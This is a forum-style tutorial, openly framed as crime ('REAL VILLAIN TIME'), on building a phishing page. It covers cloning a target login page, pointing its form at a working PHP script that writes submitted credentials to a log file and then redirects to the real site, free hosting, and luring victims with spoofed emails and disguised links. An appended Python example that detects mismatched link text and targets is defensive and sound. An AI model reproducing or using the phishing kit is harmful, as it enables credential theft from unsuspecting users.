Phishing Pages

Man

REAL VILLAIN TIME

Phishing involves tricking someone into clicking on a link that leads to a counterfeit login page, which you have created. The aim is to deceive them into submitting their login credentials. Below is a fundamental outline of how this process is typically executed.

1. Decide who / where you would like to get into
Select a target and familiarize yourself with the login or form process. Understand where users are redirected when they enter incorrect details, and determine if the error page can be accessed directly through a permanent link (permalink). Following this, the next step involves creating a replica of the page.

2. Save the source locally as an HTML file (e.g. login.html)
To effectively replicate the page, you'll need to acquire most, if not all, of the files it loads, such as images and CSS files. Typically, you can do this by using the Save shortcut (Ctrl + S), which should prompt a popup that allows you to save the content on your local machine. Ensure that you select the "Webpage, Complete" option and choose a folder for saving.

In cases where this saving method isn't available, an alternative is to right-click on the page, select "View Source," and then copy the source code into a text editor. You'll also need to manually save any images or stylesheets to their correct relative paths. Alternatively, consider using web scraper software for this task. If executed properly, your saved page should mirror the live version without any missing or broken images.

The next step involves modifying the form action in your copied page. This typically appears in a format similar to the following:

Code:
<form action="/login" method="post">

Change "/login" to be the name of the file used to save data as mentioned in the next section (e.g. "save.php").

3. Make a server-side script to save data entered into the form
In the example below PHP is used. Copy the following code into a text editor and save the file as "save.php".

PHP:
<?php
$logFile = "data.txt";

$handle = fopen($logFile, "a");
foreach ($_POST as $name => $value) {
  fwrite($handle, $name ."=". $value ."\n");
}
fwrite($handle, "\n-----\n");
fclose($handle);

header("Location: http://innocentlink.com/");
exit;
?>

If the form error page can be linked to directly, change the "innocentlink" to go to this page; otherwise change the log to be the external location of the form. The code above simply saves all POST data to a log file, but a database could be used instead.

4. Find a webhost that supports PHP
Numerous free PHP web hosting services are available, but it's crucial to choose one that doesn't display ads on the page. Once you've selected a host, upload all the files and then open the page in a web browser. If everything is done correctly, it should be indistinguishable from the authentic page. Test it by entering any data into the form and then check the log file. The data you entered should now be recorded there.

The final step is to persuade users to visit your link and input their data. This can be accomplished by mimicking an email from a reputable company or by embedding your link within anchor text (for example, using <a href="http://maliciouslink.com">http://innocentlink.com</a>). The method you choose for this depends on your strategy.

THIS HAS BEEN PSY0P AND REMEMBER; GIVE A MAN A PHISH, AND HE'LL CRIME FOR A NIGHT. TEACH A MAN TO PHISH AND HE'LL CRIME FOR THE REST OF HIS LIFE
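
An added defensive example, not part of the original post: the disguised link described in the final step (anchor text that shows one URL while the href points to another) is something a mail filter or triage script can flag. This Python check uses only the standard library; the function and class names and the sample HTML are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Text that starts like a URL or bare domain, e.g. "http://a.example/x" or "a.example".
URL_LIKE = re.compile(r"^(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})(?:[:/?#]|$)", re.I)

def _norm(host):
    host = (host or "").lower()
    return host[4:] if host.startswith("www.") else host

class AnchorAudit(HTMLParser):
    """Collect <a> elements whose visible text names a different host than href."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href") or "", []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)  # also gathers text inside nested tags

    def handle_endtag(self, tag):
        if tag != "a" or self._href is None:
            return
        shown = "".join(self._text).strip()
        match = URL_LIKE.match(shown)
        shown_host = _norm(match.group(1)) if match else ""
        real_host = _norm(urlsplit(self._href).hostname)
        # Flag only when the text itself claims a host and the href goes elsewhere.
        if shown_host and real_host and shown_host != real_host:
            self.findings.append((shown, self._href))
        self._href = None

def find_mismatched_links(html):
    audit = AnchorAudit()
    audit.feed(html)
    audit.close()
    return audit.findings

# Constructed sample message body; hostnames are the post's own placeholders.
SAMPLE = """<p>Please <a href="http://maliciouslink.com">http://innocentlink.com</a>
or read the <a href="https://www.innocentlink.com/help">innocentlink.com/help</a> page.
<a href="/unsubscribe">Unsubscribe</a></p>"""

if __name__ == "__main__":
    for shown, href in find_mismatched_links(SAMPLE):
        print(f"text shows {shown!r} but link goes to {href!r}")
```

The comparison is on exact hostnames (ignoring a leading "www."), so a production filter would compare registrable domains and allow-list known click-tracking redirectors.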